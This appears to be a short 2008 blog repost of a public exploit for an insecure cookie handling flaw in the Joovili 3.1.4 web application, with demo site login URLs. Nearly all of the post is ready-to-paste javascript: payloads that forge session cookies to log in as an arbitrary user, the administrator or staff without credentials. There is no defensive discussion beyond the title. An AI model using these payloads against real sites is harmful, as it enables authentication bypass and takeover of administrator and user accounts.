Joovili 3.1.4 Insecure Cookie Handling Vulnerability

2 Kasım 2008 Pazar

Joovili 3.1.4 Insecure Cookie Handling Vulnerability

Joovili 3.1.4 Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/6955

Discovered By: ZoRLu

demo admin login:

http://demo.joovili.com/admin

demo user login:

http://demo.joovili.com/

demo staff login:

http://demo.joovili.com/staff/

exploit for user:

javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";

for demo user:

javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";

for demo admin:

javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";

for demo staff:

javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";

ZoRLu | ZRL | Buffer Overflow

2 Kasım 2008 Pazar

Joovili 3.1.4 Insecure Cookie Handling Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com